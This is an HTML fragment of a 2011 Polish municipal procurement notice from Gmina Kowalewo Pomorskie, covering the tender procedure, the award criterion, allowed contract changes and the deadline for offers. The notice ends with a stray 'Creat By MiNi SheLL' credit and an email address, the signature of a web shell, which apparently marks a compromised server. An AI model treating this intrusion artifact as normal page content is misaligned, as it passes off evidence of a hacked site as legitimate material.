<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zajdzie konieczność wprowadzenia niezbędnych zmian w opracowywanej dokumentacji projektowej. Zajdzie konieczność wykonania opracowań dodatkowych. Zapłata za opracowania dodatkowe nastąpi na podstawie odrębnego zlecenia.
Ustawowa zmiana stawki podatku VAT. 
Zmiany zawartej umowy wymagają pisemnego uzasadnienia sporządzonego przez wykonawcę, zatwierdzonego przez Zamawiającego. Zmiana umowy wymaga pod rygorem nieważności zachowania formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kowalewopomorskie.ornetpl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Kowalewo Pomorskie
Plac Wolności 1
87 410 Kowalewo Pomorski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2011 godzina 12:30, miejsce: Urząd Miejski w Kowalewie Pomorskim , Plac Wolności 1 , 87 410 Kowalewo Pomorskie, Sekretariat , pokój numer 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com